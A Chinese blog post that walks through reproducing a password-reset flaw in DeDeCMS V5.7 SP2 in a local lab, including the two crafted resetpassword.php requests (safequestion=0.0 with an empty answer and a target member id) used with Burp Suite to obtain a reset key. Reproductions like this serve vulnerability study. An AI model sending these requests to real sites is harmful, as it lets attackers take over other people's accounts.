漏洞复现,DeDeCMS织梦

目录

一、复现环境

二、复现过程及环境


一、复现环境

PHP 5.6
DeDeCMSV5.7SP2 正式版 (2018-01-09)

二、复现过程及环境

安装 DeDeCMS
首先,利用PHPstudy安装环境

点击网站,进入后再点击创建网站,然后填写域名,可根据自己的需要来填写

回到文件夹,打开

DeDeCMS所在文件夹的uploads路径,把其下所有的文件复制到 studypro文件夹的www目录中即可

 域名/install/ 进入安装页面

 填写好基本信息

 进入网站后台,登录管理员账号

 在系统设置中开启会员功能

 

 

 然后退出管理员账号,注册会员账号,并不设置安全问题,可注册多个 

用admin可查看我注册的会员账号,我的user1的mid为2
 
接下来就是抓包啦
首先你得先有一个抓包工具BURPSUITE,点击文件夹最下方的运行薄荷.vbs
开始抓包,

域名/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2(mid是你抓包的用户的mid,比如我的是2 )用burp抓包得到key.

域名/member/resetpassword.php?dopost=getpasswd&id=2

跳转到修改密码页面,临时验证码就是key

 然后成功修改密码

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值